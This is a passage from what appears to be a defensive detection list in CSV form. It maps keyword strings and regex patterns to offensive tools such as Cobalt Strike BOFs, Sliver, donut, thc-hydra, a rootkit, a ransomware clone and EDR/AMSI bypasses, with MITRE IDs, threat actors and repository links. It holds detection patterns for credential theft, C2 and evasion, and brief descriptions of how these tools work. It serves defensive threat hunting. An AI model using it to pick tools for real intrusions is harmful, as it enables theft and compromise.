"*tgtdelegation.x86*",".{0,1000}tgtdelegation\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","61205"
"*tgtParse.py *",".{0,1000}tgtParse\.py\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","61206"
"*th3rd/heroinn*",".{0,1000}th3rd\/heroinn.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","61207"
"*TH3xACE/EDR-Test*",".{0,1000}TH3xACE\/EDR\-Test.{0,1000}","offensive_tool_keyword","EDR-Test","Automating EDR Testing with reference to MITRE ATTACK via Cobalt Strike [Purple Team].","T1027 - T1059 - T1105 - T1203 - T1078","TA0007 - TA0005 - TA0011 - TA0002","N/A","N/A","Exploitation tool","https://github.com/TH3xACE/EDR-Test","1","1","N/A","N/A","N/A","2","150","20","2023-03-27T11:39:32Z","2022-03-27T08:58:49Z","61208"
"*Thank you for using ADeleginator. Godspeed! :O*",".{0,1000}Thank\syou\sfor\susing\sADeleginator\.\sGodspeed!\s\:O.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","61209"
"*Thank you for using DNSCrypt-Proxy!*",".{0,1000}Thank\syou\sfor\susing\sDNSCrypt\-Proxy!.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","61210"
"*Thanks for using GTFONow!*",".{0,1000}Thanks\sfor\susing\sGTFONow!.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","61211"
"*THASH /runts /user:*",".{0,1000}THASH\s\/runts\s\/user\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","61212"
"*thc-hydra*",".{0,1000}thc\-hydra.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","61213"
"*thc-hydra.git*",".{0,1000}thc\-hydra\.git.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","61214"
"*thc-hydra.git*",".{0,1000}thc\-hydra\.git.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","61215"
"*The AS-REQ is valid! Attempting to roast *",".{0,1000}The\sAS\-REQ\sis\svalid!\sAttempting\sto\sroast\s.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","61216"
"*The backdoor just signaled an ACK. This should not have happened*",".{0,1000}The\sbackdoor\sjust\ssignaled\san\sACK\.\sThis\sshould\snot\shave\shappened.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","61217"
"*The evil_ddl_trigger trigger has been added. It will run with any DDL event.*",".{0,1000}The\sevil_ddl_trigger\strigger\shas\sbeen\sadded\.\sIt\swill\srun\swith\sany\sDDL\sevent\..{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","61219"
"*The exploit is ready. A reboot is now required to trigger it*",".{0,1000}The\sexploit\sis\sready\.\sA\sreboot\sis\snow\srequired\sto\strigger\sit.{0,1000}","offensive_tool_keyword","Ikeext-Privesc","Windows IKEEXT DLL Hijacking Exploit Tool","T1546.011 - T1574.009 - T1036.004","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/securycore/Ikeext-Privesc","1","0","N/A","N/A","10","1","33","52","2018-02-25T13:45:15Z","2018-02-27T11:18:56Z","61220"
"*The implant command allows users to run commands on slivers from their*",".{0,1000}The\simplant\scommand\sallows\susers\sto\srun\scommands\son\sslivers\sfrom\stheir.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","61221"
"*The malware Go file has been completed.*",".{0,1000}The\smalware\sGo\sfile\shas\sbeen\scompleted\..{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","61222"
"*The nanodump was created succesfully*",".{0,1000}The\snanodump\swas\screated\ssuccesfully.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","61223"
"*The Ransomware for RedTeams Coded by Siddhant Gour with *",".{0,1000}The\sRansomware\sfor\sRedTeams\sCoded\sby\sSiddhant\sGour\swith\s.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","61224"
"*The Relaying Kerberos Framework - SMB Server edition by @decoder_it*",".{0,1000}The\sRelaying\sKerberos\sFramework\s\-\sSMB\sServer\sedition\sby\s\@decoder_it.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","#content","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","61225"
"*The smart password spraying and bruteforcing tool for Active Directory Domain Services*",".{0,1000}The\ssmart\spassword\sspraying\sand\sbruteforcing\stool\sfor\sActive\sDirectory\sDomain\sServices.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","61226"
"*the-backdoor-factory-master*",".{0,1000}the\-backdoor\-factory\-master.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE  ELF  Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","61228"
"*TheCyb3rAlpha/BobTheSmuggler*",".{0,1000}TheCyb3rAlpha\/BobTheSmuggler.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","1","N/A","N/A","10","6","534","62","2025-03-10T07:32:22Z","2024-01-10T08:04:57Z","61230"
"*TheD1rkMtr/AMSI_patch*",".{0,1000}TheD1rkMtr\/AMSI_patch.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","N/A","8","2","145","29","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z","61231"
"*TheD1rkMtr/D1rkInject*",".{0,1000}TheD1rkMtr\/D1rkInject.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","61232"
"*TheD1rkMtr/DocPlz*",".{0,1000}TheD1rkMtr\/DocPlz.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","61233"
"*TheD1rkMtr/GithubC2*",".{0,1000}TheD1rkMtr\/GithubC2.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","1","N/A","N/A","10","10","136","37","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z","61234"
"*TheD1rkMtr/HeapCrypt*",".{0,1000}TheD1rkMtr\/HeapCrypt.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","N/A","9","3","239","44","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z","61235"
"*TheD1rkMtr/NTDLLReflection*",".{0,1000}TheD1rkMtr\/NTDLLReflection.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","N/A","9","3","293","45","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z","61236"
"*TheD1rkMtr/Pspersist*",".{0,1000}TheD1rkMtr\/Pspersist.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","1","N/A","N/A","10","1","85","24","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z","61237"
"*TheD1rkMtr/Shellcode-Hide*",".{0,1000}TheD1rkMtr\/Shellcode\-Hide.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","61238"
"*TheD1rkMtr/StackCrypt*",".{0,1000}TheD1rkMtr\/StackCrypt.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","N/A","9","2","159","27","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z","61239"
"*TheD1rkMtr/UnhookingPatch*",".{0,1000}TheD1rkMtr\/UnhookingPatch.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","N/A","9","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","61240"
"*TheGejr/SpringShell*",".{0,1000}TheGejr\/SpringShell.{0,1000}","offensive_tool_keyword","Spring4Shell","Spring4Shell Proof Of Concept/Information CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/TheGejr/SpringShell","1","1","N/A","N/A","N/A","2","127","84","2022-04-04T14:09:11Z","2022-03-30T17:05:46Z","61241"
"*theHarvester*",".{0,1000}theHarvester.{0,1000}","offensive_tool_keyword","theHarvester","E-mails. subdomains and names Harvester.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Reconnaissance","https://github.com/laramies/theHarvester","1","0","N/A","N/A","N/A","10","12476","2143","2025-04-22T21:05:21Z","2011-01-01T20:40:15Z","61242"
"*theHarvester.py -d *",".{0,1000}theHarvester\.py\s\-d\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","61243"
"*thelinuxchoice/saycheese*",".{0,1000}thelinuxchoice\/saycheese.{0,1000}","offensive_tool_keyword","saycheese","Grab target's webcam shots by link","T1213 - T1071 - T1102 - T1123 - T1185 - T1200","TA0001 - TA0005 - TA0009 - TA0011","N/A","N/A","Phishing","https://github.com/hangetzzu/saycheese","1","1","#linux","N/A","9","10","1175","962","2024-06-18T23:39:41Z","2019-04-29T04:07:00Z","61244"
"*thelinuxchoice/tweetshell*",".{0,1000}thelinuxchoice\/tweetshell.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","#linux","N/A","7","10","3581","391","2024-09-02T19:15:22Z","2019-03-28T18:07:05Z","61245"
"*ThemeBleed.exe  *",".{0,1000}ThemeBleed\.exe\s\s.{0,1000}","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tool","https://github.com/gabe-k/themebleed","1","0","N/A","N/A","10","2","196","37","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z","61246"
"*ThePorgs/Exegol-images*",".{0,1000}ThePorgs\/Exegol\-images.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","61247"
"*therealwover@protonmail.com*",".{0,1000}therealwover\@protonmail\.com.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","#email","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","61248"
"*TheresAFewConors/MSSprinkler*",".{0,1000}TheresAFewConors\/MSSprinkler.{0,1000}","offensive_tool_keyword","MSSprinkler","password spraying utility for organizations to test their M365 accounts from an external perspective. It employs a 'low-and-slow' approach","T1110.003 - T1110.001","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/TheresAFewConors/MSSprinkler","1","1","N/A","N/A","9","1","74","7","2025-02-25T13:32:41Z","2024-09-15T09:54:53Z","61249"
"*TheRook/subbrute*",".{0,1000}TheRook\/subbrute.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","1","N/A","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","61250"
"*The-Viper-One/Invoke-PowerIncrease*",".{0,1000}The\-Viper\-One\/Invoke\-PowerIncrease.{0,1000}","offensive_tool_keyword","Invoke-PowerIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/The-Viper-One/Invoke-PowerIncrease","1","1","N/A","N/A","8","1","3","0","2024-08-01T18:10:02Z","2024-07-18T17:40:26Z","61251"
"*The-Viper-One/Invoke-RDPThief*",".{0,1000}The\-Viper\-One\/Invoke\-RDPThief.{0,1000}","offensive_tool_keyword","Invoke-RDPThief","perform process injection on the target process and inject RDPthief into the process in order to capture cleartext credentials","T1055 - T1056 - T1071 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/The-Viper-One/Invoke-RDPThief","1","1","N/A","N/A","10","1","62","8","2025-01-21T20:12:33Z","2024-10-01T20:12:00Z","61252"
"*The-Viper-One/PME-Scripts*",".{0,1000}The\-Viper\-One\/PME\-Scripts.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","61253"
"*The-Viper-One/PsMapExec*",".{0,1000}The\-Viper\-One\/PsMapExec.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","1","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","61254"
"*thewover/donut*",".{0,1000}thewover\/donut.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","61255"
"*thiagopeixoto/winsos-poc*",".{0,1000}thiagopeixoto\/winsos\-poc.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","1","N/A","N/A","10","2","111","26","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z","61256"
"*thief.py -*",".{0,1000}thief\.py\s\-.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","N/A","9","2","189","35","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z","61257"
"*ThievingFox.py *",".{0,1000}ThievingFox\.py\s.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","61258"
"*third_party/SharpGen*",".{0,1000}third_party\/SharpGen.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - 